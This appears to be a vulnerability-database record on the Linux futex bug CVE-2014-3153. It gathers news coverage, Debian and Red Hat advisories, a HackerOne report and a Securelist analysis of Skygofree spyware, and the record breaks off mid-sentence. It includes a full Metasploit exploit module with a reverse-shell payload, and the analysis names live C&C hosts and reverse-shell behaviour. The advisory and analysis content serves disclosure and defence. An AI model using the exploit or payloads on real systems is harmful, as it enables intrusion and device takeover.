Attack](https://2.bp.blogspot.com/-pxMyh-8rhv0/U5L2SbAMTZI/AAAAAAAAb_I/A-iqdubuyv8/s728/linux-kernel-hacking.jpg)](<https://2.bp.blogspot.com/-pxMyh-8rhv0/U5L2SbAMTZI/AAAAAAAAb_I/A-iqdubuyv8/s1600/linux-kernel-hacking.jpg>)\n\nMultiple flaws have been identified in Linux Kernel and related software could allow hackers to hack your Linux machines, shared hosting and websites hosted on them.\n\n \n\n\n**PRIVILEGE ESCALATION VULNERABILITY IN LINUX KERNEL**\n\nA privilege escalation vulnerability has been [identified](<https://lists.debian.org/debian-security-announce/2014/msg00130.html>) in the widely used Linux kernel that could allow an attackers to take the control of users\u2019 system.\n\n \n\n\nOn Thursday, the most popular distributor of open source Linux OS, Debian warned about this vulnerability (CVE-2014-3153) in a security update, along with some other vulnerabilities in the Linux kernel that may lead to a denial of service attack.\n\n \n\n\nThe most critical one is the flaw (CVE-2014-3153) discovered by Pinkie Pie which resides in the futex subsystem call of _[Linux Kernel](<https://thehackernews.com/search/label/Linux%20kernel>) 2.6.32.62/3.2.59/3.4.91/3.10.41/3.12.21/3.14.5 versions_, leaving a queued kernel waiter on the stack, which can be exploited to potentially execute arbitrary code with kernel mode privileges.\n\n> \"_Pinkie Pie discovered an issue in the futex subsystem that allows a local user to gain ring 0 control via the futex syscall,_\" reads the advisory. \"_An unprivileged user could use this flaw to crash the kernel (resulting in denial of service) or for privilege escalation.\"_\n\n[Pinkie Pie](<https://thehackernews.com/search/label/Pinkie%20Pie%20hacker>) is the anonymous teenage ethical and skilled hacker who scooped at least $100,000 for bypassing the security features of Google's Chrome, many of them sandbox exploits, at both Pwnium and Pwn2Own competitions every year since 2012.\n\n \n\n\n**RESEARCHER\u2019S ADVICE**\n\n_Kees Cook_, a Google Chrome OS security researcher and Ubuntu contributor said that the latest flaw found by Pinkie Pie is \"urgent to fix.\"\n\n> \"_Specifically, the futex syscall can leave a queued kernel waiter hanging on the stack. By manipulating the stack with further syscalls, the waiter structure can be altered. When later woken up, the altered waiter can result in arbitrary code execution in ring 0,_\" Cook [wrote](<http://seclists.org/oss-sec/2014/q2/469>) Thursday on Seclists.org. \"_This flaw is especially urgent to fix because futex tends to be available within most Linux sandboxes (because it is used as a glibc pthread primitive)._\"\n\n**CHKROOTKIT - ANOTHER CRITICAL FLAW**\n\nThe vulnerability highlighted two days after Thomas Stangner [reported](<http://www.openwall.com/lists/oss-security/2014/06/04/9>) a serious flaw in the chkrootkit (Check Rootkit), a rootkit detector, that allows a local attacker to gain root access to gain root control by executing malicious code inside the_ /tmp_ directory.\n\n \n\n\nA common Unix-based program, chkrootkit helps system administrators to check their systems for known rootkits. The vulnerability in the chkrootkit, assigned **_CVE-2014-0476_** ID, actually resides in the slapper() function in the shell script chkrootkit package. A non-root user can place any malicious executable file named 'update' in _/tmp_ folder, which will get executed as root whenever chkrootkit will scan this directory for rootkits.\n\n \n\n\n**OTHER VULNERABILITIES IN LINUX KERNEL**\n\nAnother security issues (_**CVE-2014-3144 and CVE-2014-3145**_) also have been discovered in the Linux kernel that could allow any local user to cause a [Denial of Service (DoS) attack](<https://thehackernews.com/search/label/dos%20attack>) via crafted BPF instructions.\n\n \n\n\nDebian has issued the patches for these vulnerabilities and encouraged Linux users to upgrade their Linux packages highlighting that the issue has been fixed in the stable distribution, version 3.2.57-3+deb7u2, and will be fixed in the unstable distribution as soon as possible.\n", "modified": "2014-06-07T11:43:57", "published": "2014-06-07T00:29:00", "id": "THN:B13AEDC0DAC18F19211BE2B4BE0C4787", "href": "https://thehackernews.com/2014/06/linux-kernel-vulnerable-to-privilege_7.html", "type": "thn", "title": "Linux Kernel Vulnerable to Privilege Escalation and DoS Attack", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:37", "description": "", "published": "2015-02-09T00:00:00", "type": "packetstorm", "title": "Android Futex Requeue Kernel Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2015-02-09T00:00:00", "id": "PACKETSTORM:130329", "href": "https://packetstormsecurity.com/files/130329/Android-Futex-Requeue-Kernel-Exploit.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \nrequire 'rex' \n \nclass Metasploit4 < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Common \n \ndef initialize(info={}) \nsuper( update_info( info, { \n'Name' => 'Android futex requeue kernel exploit', \n'Description' => %q{ \nThis module exploits a bug in futex_requeue in the linux kernel. \nAny android phone with a kernel built before June 2014 should be vulnerable. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Pinkie Pie', #discovery \n'geohot', #towelroot \n'timwr' #metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2014-3153' ], \n[ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ], \n[ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ], \n], \n'SessionTypes' => [ 'meterpreter' ], \n'Platform' => 'android', \n'Targets' => [[ 'Automatic', { }]], \n'Arch' => ARCH_DALVIK, \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'android/meterpreter/reverse_tcp', \n}, \n'DefaultTarget' => 0 \n} \n)) \n \nregister_options([ \nOptString.new(\"WritableDir\", [ true, \"Temporary directory to write files\", \"/data/local/tmp/\" ]), \n], self.class) \nend \n \ndef put_local_file(remotefile) \nlocalfile = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-3153.elf\" ) \ndata = File.read(localfile, {:mode => 'rb'}) \nwrite_file(remotefile, data) \nend \n \ndef exploit \nworkingdir = session.fs.dir.getwd \nexploitfile = \"#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}\" \npayloadfile = \"#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}\" \n \nput_local_file(exploitfile) \ncmd_exec('/system/bin/chmod 700 ' + exploitfile) \nwrite_file(payloadfile, payload.raw) \n \ntmpdir = datastore['WritableDir'] \nrootclassdir = \"#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}\" \nrootpayload = \"#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar\" \n \nrootcmd = \" mkdir #{rootclassdir} && \" \nrootcmd += \"cd #{rootclassdir} && \" \nrootcmd += \"cp \" + payloadfile + \" #{rootpayload} && \" \nrootcmd += \"chmod 766 #{rootpayload} && \" \nrootcmd += \"dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload\" \n \nprocess = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true}) \nprocess.channel.read \nend \n \nend \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130329/futex_requeue.rb.txt"}], "hackerone": [{"lastseen": "2016-09-03T01:44:00", "bulletinFamily": "bugbounty", "bounty": 10000.0, "cvelist": ["CVE-2014-3153"], "description": "I hope I haven't messed something up...\r\n\r\nThe issue exists when after blocking in futex_wait_requeue_pi, q.rt_waiter is NULL but &rt_waiter (on the stack) has been added to various waiter lists by rt_mutex_start_proxy_lock.\r\n\r\nThis is not supposed to be possible, because setting rt_waiter to NULL indicates atomic acquisition. This is done by requeue_pi_wake_futex, which is called by futex_requeue (FUTEX_CMP_REQUEUE_PI) in two cases where the lock could be acquired immediately on behalf of some waiter rather than blocking. Meanwhile, rt_mutex_start_proxy_lock is only called from the bottom of futex_requeue, and only enqueues rt_waiter if the lock could *not* be acquired immediately. Since any particular FUTEX_WAIT_REQUEUE_PI is only supposed to be requeued once, those two possibilities should be mutually exclusive.\r\n\r\nThe requeue-once rule is enforced by only allowing requeueing to the futex previously passed to futex_wait_requeue_pi as uaddr2, so it's not possible to requeue from A to B, then from B to C - but it is possible to requeue from B to B.\r\n\r\nWhen this happens, if (!q.rt_waiter) passes, so rt_mutex_finish_proxy_lock is never called. (Also, AFAIK, free_pi_state is never called, which is true even without this weird requeue; in the case where futex_requeue calls requeue_pi_wake_futex directly, pi_state will sit around until it gets cleaned up in exit_pi_state_list when the thread exits. This is not a vulnerability.) futex_wait_requeue_pi exits, and various pointers to rt_waiter become dangling.\r\n\r\nI haven't actually tested this in a sandbox, but from reading the code, I believe most/all the syscalls used in the exploit are allowed by the Chromium renderer, GPU, NaCl, etc. sandbox - in particular, futex, setpriority, and prctl, without restrictions. (setpriority is overridden to allowed in those policies; the others are in the baseline policy.) Also, the exploit should be able to defeat KASLR, although it was not actually enabled in the kernel I was testing on (see comments).\r\n\r\nI have attached an exploit for the Debian 3.14.4-1 Linux image on amd64, which manages to run some code in kernel mode and return. As discussed in the comments, it may be nontrivial to port to other kernel builds due to unpredictable compiler decisions, but I hope it demonstrates exploitability.\r\n\r\n\r\n", "modified": "1970-01-01T00:00:00", "published": "2014-05-26T05:00:49", "id": "H1:13388", "href": "https://hackerone.com/reports/13388", "type": "hackerone", "title": "Sandbox Escape: Linux PI futex self-requeue bug", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "android": [{"lastseen": "2020-12-24T13:21:13", "bulletinFamily": "software", "cvelist": ["CVE-2014-3153"], "description": "The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.", "edition": 2, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "ANDROID:TOWELROOT", "href": "http://www.androidvulnerabilities.org/vulnerabilities/TowelRoot.html", "title": "TowelRoot", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1737", "CVE-2014-1738", "CVE-2014-3153"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem handled\nthe requeuing of certain Priority Inheritance (PI) futexes. A local,\nunprivileged user could use this flaw to escalate their privileges on the\nsystem. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled user\nspace provided data in certain error code paths while processing FDRAWCMD\nIOCTL commands. A local user with write access to /dev/fdX could use this\nflaw to free (using the kfree() function) arbitrary kernel memory.\n(CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal kernel\nmemory addresses to user space during the processing of the FDRAWCMD IOCTL\ncommand. A local user with write access to /dev/fdX could use this flaw to\nobtain information about the kernel heap arrangement. (CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two flaws\n(CVE-2014-1737 in combination with CVE-2014-1738) to escalate their\nprivileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter of\nCVE-2014-3153.\n\nThis update also fixes the following bug:\n\n* A previous change that introduced global clock updates caused guest\nmachines to boot slowly when the host Time Stamp Counter (TSC) was marked\nas unstable. The slow down increased with the number of vCPUs allocated.\nTo resolve this problem, a patch has been applied to limit the rate of the\nglobal clock updates. (BZ#1102253)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2015-04-24T14:20:26", "published": "2014-07-17T04:00:00", "id": "RHSA-2014:0900", "href": "https://access.redhat.com/errata/RHSA-2014:0900", "type": "redhat", "title": "(RHSA-2014:0900) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:58", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1737", "CVE-2014-1738", "CVE-2014-3153"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem handled\nthe requeuing of certain Priority Inheritance (PI) futexes. A local,\nunprivileged user could use this flaw to escalate their privileges on the\nsystem. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled user\nspace provided data in certain error code paths while processing FDRAWCMD\nIOCTL commands. A local user with write access to /dev/fdX could use this\nflaw to free (using the kfree() function) arbitrary kernel memory.\n(CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal kernel\nmemory addresses to user space during the processing of the FDRAWCMD IOCTL\ncommand. A local user with write access to /dev/fdX could use this flaw to\nobtain information about the kernel heap arrangement. (CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two flaws\n(CVE-2014-1737 in combination with CVE-2014-1738) to escalate their\nprivileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter of\nCVE-2014-3153.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2015-04-24T14:20:41", "published": "2014-06-26T04:00:00", "id": "RHSA-2014:0800", "href": "https://access.redhat.com/errata/RHSA-2014:0800", "type": "redhat", "title": "(RHSA-2014:0800) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:39", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3145", "CVE-2014-3144", "CVE-2014-3153"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2949-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nJune 05, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2014-3144 CVE-2014-3145 CVE-2014-3153\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service or privilege escalation:\n\nCVE-2014-3144 / CVE-2014-3145\n\n A local user can cause a denial of service (system crash) via\n crafted BPF instructions.\n\nCVE-2014-3153\n\n Pinkie Pie discovered an issue in the futex subsystem that allows a\n local user to gain ring 0 control via the futex syscall. An\n unprivileged user could use this flaw to crash the kernel (resulting\n in denial of service) or for privilege escalation.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 3.2.57-3+deb7u2.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2014-06-05T12:16:16", "published": "2014-06-05T12:16:16", "id": "DEBIAN:DSA-2949-1:5D47D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00130.html", "title": "[SECURITY] [DSA 2949-1] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:12", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0224", "CVE-2014-3470", "CVE-2014-0195", "CVE-2014-3153", "CVE-2014-0221"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2950-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJune 05, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-0195 CVE-2014-0221 CVE-2014-0224 CVE-2014-3470\n\nMultiple vulnerabilities have been discovered in OpenSSL:\n\nCVE-2014-0195\n\n Jueri Aedla discovered that a buffer overflow in processing DTLS\n fragments could lead to the execution of arbitrary code or denial\n of service.\n\nCVE-2014-0221\n\n Imre Rad discovered the processing of DTLS hello packets is \n susceptible to denial of service.\n\nCVE-2014-0224\n\n KIKUCHI Masashi discovered that carefully crafted handshakes can\n force the use of weak keys, resulting in potential man-in-the-middle\n attacks.\n\nCVE-2014-3470\n\n Felix Groebert and Ivan Fratric discovered that the implementation of\n anonymous ECDH ciphersuites is suspectible to denial of service.\n\nAdditional information can be found at \nhttp://www.openssl.org/news/secadv_20140605.txt\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.0.1e-2+deb7u10. All applications linked to openssl need to\nbe restarted. You can use the tool checkrestart from the package\ndebian-goodies to detect affected programs or reboot your system. There's\nalso a forthcoming security update for the Linux kernel later the day\n(CVE-2014-3153), so you need to reboot anyway. Perfect timing, isn't it?\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your openssl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2014-06-05T11:50:58", "published": "2014-06-05T11:50:58", "id": "DEBIAN:DSA-2950-1:15DF5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00129.html", "title": "[SECURITY] [DSA 2950-1] openssl security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2018-01-17T15:58:19", "bulletinFamily": "blog", "cvelist": ["CVE-2013-2094", "CVE-2013-2595", "CVE-2013-6282", "CVE-2014-3153", "CVE-2015-3636"], "description": "![](https://securelist.com/files/2018/01/abstraction_180117-990x400.jpeg)\n\nAt the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago \u2013 at the end of 2014. Since then, the implant's functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals.\n\nWe observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants. These domains have been registered by the attackers since 2015. According to our telemetry, that was the year the distribution campaign was at its most active. The activities continue: the most recently observed domain was registered on October 31, 2017. Based on our KSN statistics, there are several infected individuals, exclusively in Italy.\n\nMoreover, as we dived deeper into the investigation, we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine. The version we found was built at the beginning of 2017, and at the moment we are not sure whether this implant has been used in the wild.\n\nWe named the malware Skygofree, because we found the word in one of the domains*. \n\n## Malware Features\n\n### Android\n\nAccording to the observed samples and their signatures, early versions of this Android malware were developed by the end of 2014 and the campaign has remained active ever since.\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-1.png)](<https://securelist.com/files/2018/01/180115-skygofree-1.png>)\n\n_Signature of one of the earliest versions_\n\nThe code and functionality have changed numerous times; from simple unobfuscated malware at the beginning to sophisticated multi-stage spyware that gives attackers full remote control of the infected device. We have examined all the detected versions, including the latest one that is signed by a certificate valid from September 14, 2017.\n\nThe implant provides the ability to grab a lot of exfiltrated data, like call records, text messages, geolocation, surrounding audio, calendar events, and other memory information stored on the device.\n\nAfter manual launch, it shows a fake welcome notification to the user:\n\n_Dear Customer, we're updating your configuration and it will be ready as soon as possible._\n\nAt the same time, it hides an icon and starts background services to hide further actions from the user.\n\n**Service Name** | **Purpose** \n---|--- \nAndroidAlarmManager | Uploading last recorded .amr audio \nAndroidSystemService | Audio recording \nAndroidSystemQueues | Location tracking with movement detection \nClearSystems | GSM tracking (CID, LAC, PSC) \nClipService | Clipboard stealing \nAndroidFileManager | Uploading all exfiltrated data \nAndroidPush | XMPP \u0421&C protocol (url.plus:5223) \nRegistrationService | Registration on C&C via HTTP (url.plus/app/pro/) \n \nInterestingly, a self-protection feature was implemented in almost every service. Since in Android 8.0 (SDK API 26) the system is able to kill idle services, this code raises a fake update notification to prevent it:\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-2.png)](<https://securelist.com/files/2018/01/180115-skygofree-2.png>)\n\nCybercriminals have the ability to control the implant via HTTP, XMPP, binary SMS and [FirebaseCloudMessaging](<https://firebase.google.com/docs/cloud-messaging/>) (or GoogleCloudMessaging in older versions) protocols. Such a diversity of protocols gives the attackers more flexible control. In the latest implant versions there are 48 different commands. You can find a full list with short descriptions in the Appendix. Here are some of the most notable:\n\n * 'geofence' - this command adds a specified location to the implant's internal database and when it matches a device's current location the malware triggers and begins to record surrounding audio.\n * \"social\" \u2013 this command that starts the 'AndroidMDMSupport' service - this allows the files of any other installed application to be grabbed. The service name makes it clear that by applications the attackers mean MDM solutions that are business-specific tools. The operator can specify a path with the database of any targeted application and server-side PHP script name for uploading. \n\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-3.png)](<https://securelist.com/files/2018/01/180115-skygofree-3.png>)\n\n_Several hardcoded applications targeted by the MDM-grabbing command_\n\n * 'wifi' \u2013 this command creates a new Wi-Fi connection with specified configurations from the command and enable Wi-Fi if it is disabled. So, when a device connects to the established network, this process will be in silent and automatic mode. This command is used to connect the victim to a Wi-Fi network controlled by the cybercriminals to perform traffic sniffing and man-in-the-middle (MitM) attacks. \n\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-4.png)](<https://securelist.com/files/2018/01/180115-skygofree-4.png>)\n\n_addWifiConfig method code fragments_\n\n * 'camera' \u2013 this command records a video/capture a photo using the front-facing camera when someone next unlocks the device.\n\nSome versions of the Skygofree feature the self-protection ability exclusively for Huawei devices. There is a 'protected apps' list in this brand's smartphones, related to a battery-saving concept. Apps not selected as protected apps stop working once the screen is off and await re-activation, so the implant is able to determine that it is running on a Huawei device and add itself to this list. Due to this feature, it is clear that the developers paid special attention to the work of the implant on Huawei devices.\n\nAlso, we found a debug version of the implant (70a937b2504b3ad6c623581424c7e53d) that contains interesting constants, including the version of the spyware.\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-5.png)](<https://securelist.com/files/2018/01/180115-skygofree-5.png>)\n\n_Debug BuildConfig with the version_\n\nAfter a deep analysis of all discovered versions of Skygofree, we made an approximate timeline of the implant's evolution.\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-6.png)](<https://securelist.com/files/2018/01/180115-skygofree-6.png>)\n\n_Mobile implant evolution timeline_\n\nHowever, some facts indicate that the APK samples from stage two can also be used separately as the first step of the infection. Below is a list of the payloads used by the Skygofree implant in the second and third stages.\n\n#### Reverse shell payload\n\nThe reverse shell module is an external ELF file compiled by the attackers to run on Android. The choice of a particular payload is determined by the implant's version, and it can be downloaded from the command and control (C&C) server soon after the implant starts, or after a specific command. In the most recent case, the choice of the payload zip file depends on the device process architecture. For now, we observe only one payload version for following the ARM CPUs: arm64-v8a, armeabi, armeabi-v7a.\n\nNote that in almost all cases, this payload file, contained in zip archives, is named 'setting' or 'setting.o'.\n\nThe main purpose of this module is providing reverse shell features on the device by connecting with the C&C server's socket.\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-7.png)](<https://securelist.com/files/2018/01/180115-skygofree-7.png>)\n\n_Reverse shell payload_\n\nThe payload is started by the main module with a specified host and port as a parameter that is hardcoded to '54.67.109.199' and '30010' in some versions:\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-8.png)](<https://securelist.com/files/2018/01/180115-skygofree-8.png>)\n\nAlternatively, they could be hardcoded directly into the payload code:\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-8-5.gif)](<https://securelist.com/files/2018/01/180115-skygofree-8-5.gif>)\n\nWe also observed variants that were equipped with similar reverse shell payloads directly in the main APK /lib/ path.\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-9.png)](<https://securelist.com/files/2018/01/180115-skygofree-9.png>)\n\n_Equipped reverse shell payload with specific string_\n\nAfter an in-depth look, we found that some versions of the reverse shell payload code share similarities with PRISM - a stealth reverse shell backdoor that is available on [Github](<https://github.com/andreafabrizi/prism/>).\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-10.png)](<https://securelist.com/files/2018/01/180115-skygofree-10.png>)\n\n_Reverse shell payload from update_dev.zip_\n\n#### Exploit payload\n\nAt the same time, we found an important payload binary that is trying to exploit several known vulnerabilities and escalate privileges. According to several timestamps, this payload is used by implant versions created since 2016. It can also be downloaded by a specific command. The exploit payload contains following file components:\n\n**Component name** | **Description** \n---|--- \nrun_root_shell/arrs_put_user.o/arrs_put_user/poc | Exploit ELF \ndb | Sqlite3 tool ELF \ndevice.db | Sqlite3 database with supported devices and their constants needed for privilege escalation \n \n'device.db' is a database used by the exploit. It contains two tables - 'supported_devices' and 'device_address'. The first table contains 205 devices with some Linux properties; the second contains the specific memory addresses associated with them that are needed for successful exploitation. You can find a full list of targeted models in the Appendix.\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-11.png)](<https://securelist.com/files/2018/01/180115-skygofree-11.png>)\n\n_Fragment of the database with targeted devices and specific memory addresses_\n\nIf the infected device is not listed in this database, the exploit tries to discover these addresses programmatically.\n\nAfter downloading and unpacking, the main module executes the exploit binary file. Once executed, the module attempts to get root privileges on the device by exploiting the following vulnerabilities:\n\nCVE-2013-2094 \nCVE-2013-2595 \nCVE-2013-6282 \nCVE-2014-3153 (futex aka [TowelRoot](<https://threatpost.com/android-root-access-vulnerability-affecting-most-devices/106683/>)) \nCVE-2015-3636\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-12.png)](<https://securelist.com/files/2018/01/180115-skygofree-12.png>)\n\n_Exploitation process_\n\nAfter an in-depth look, we found that the exploit payload code shares several similarities with the public project [android-rooting-tools](<https://github.com/android-rooting-tools>).\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-13.png)](<https://securelist.com/files/2018/01/180115-skygofree-13.png>)\n\n_Decompiled exploit function code fragment_\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-14.png)](<https://securelist.com/files/2018/01/180115-skygofree-14.png>)\n\n_run_with_mmap function from the android-rooting-tools project_\n\nAs can be seen from the comparison, there are similar strings and also a unique comment in Italian, so it looks like the attackers created this exploit payload based on android-rooting-tools project source code.\n\n#### Busybox payload\n\nBusybox is public software that provides several Linux tools in a single ELF file. In earlier versions, it operated with shell commands like this:\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-15.png)](<https://securelist.com/files/2018/01/180115-skygofree-15.png>)\n\n_Stealing WhatsApp encryption key with Busybox_\n\n#### Social payload\n\nActually, this is not a standalone payload file \u2013 in all the observed versions its code was compiled with exploit payload in one file ('poc_perm', 'arrs_put_user', 'arrs_put_user.o'). This is due to the fact that the implant needs to escalate privileges before performing social payload actions. This payload is also used by the earlier versions of the implant. It has similar functionality to the 'AndroidMDMSupport' command from the current versions \u2013 stealing data belonging to other installed applications. The payload will execute shell code to steal data from various applications. The example below steals Facebook data:\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-16.png)](<https://securelist.com/files/2018/01/180115-skygofree-16.png>)\n\nAll the other hardcoded applications targeted by the payload:\n\n**Package name** | **Name** \n---|--- \njp.naver.line.android | LINE: Free Calls & Messages \ncom.facebook.orca | Facebook messenger \ncom.facebook.katana | Facebook \ncom.whatsapp | WhatsApp \ncom.viber.voip | Viber \n \n#### Parser payload\n\nUpon receiving a specific command, the implant can download a special payload to grab sensitive information from external applications. The case where we observed this involved WhatsApp.\n\nIn the examined version, it was downloaded from:\n\n_hxxp://url[.]plus/Updates/tt/parser.apk_\n\nThe payload can be a .dex or .apk file which is a Java-compiled Android executable. After downloading, it will be loaded by the main module via DexClassLoader api:\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-17.png)](<https://securelist.com/files/2018/01/180115-skygofree-17.png>)\n\nAs mentioned, we observed a payload that exclusively targets the WhatsApp messenger and it does so in an original way. The payload uses the Android Accessibility Service to get information directly from the displayed elements on the screen, so it waits for the targeted application to be launched and then parses all nodes to find text messages:\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-18.png)](<https://securelist.com/files/2018/01/180115-skygofree-18.png>)\n\nNote that the implant needs special permission to use the Accessibility Service API, but there is a command that performs a request with a phishing text displayed to the user to obtain such permission.\n\n### Windows\n\nWe have found multiple components that form an entire spyware system for the Windows platform.\n\n**Name** | **MD5** | **Purpose** \n---|---|--- \nmsconf.exe | 55fb01048b6287eadcbd9a0f86d21adf | Main module, reverse shell \nnetwork.exe | f673bb1d519138ced7659484c0b66c5b | Sending exfiltrated data \nsystem.exe | d3baa45ed342fbc5a56d974d36d5f73f | Surrounding sound recording by mic \nupdate.exe | 395f9f87df728134b5e3c1ca4d48e9fa | Keylogging \nwow.exe | 16311b16fd48c1c87c6476a455093e7a | Screenshot capturing \nskype_sync2.exe | 6bcc3559d7405f25ea403317353d905f | Skype call recording to MP3 \n \nAll modules, except skype_sync2.exe, are written in Python and packed to binary files via the Py2exe tool. This sort of conversion allows Python code to be run in a Windows environment without pre-installed Python binaries.\n\nmsconf.exe is the main module that provides control of the implant and reverse shell feature. It opens a socket on the victim's machine and connects with a server-side component of the implant located at 54.67.109.199:6500. Before connecting with the socket, it creates a malware environment in 'APPDATA/myupd' and creates a sqlite3 database there \u2013 'myupd_tmp\\\\\\mng.db':\n\nCREATE TABLE MANAGE(ID INT PRIMARY KEY NOT NULL,Send INT NOT NULL, Keylogg INT NOT NULL,Screenshot INT NOT NULL,Audio INT NOT NULL); \nINSERT INTO MANAGE (ID,Send,Keylogg,Screenshot,Audio) VALUES (1, 1, 1, 1, 0 )\n\nFinally, the malware modifies the 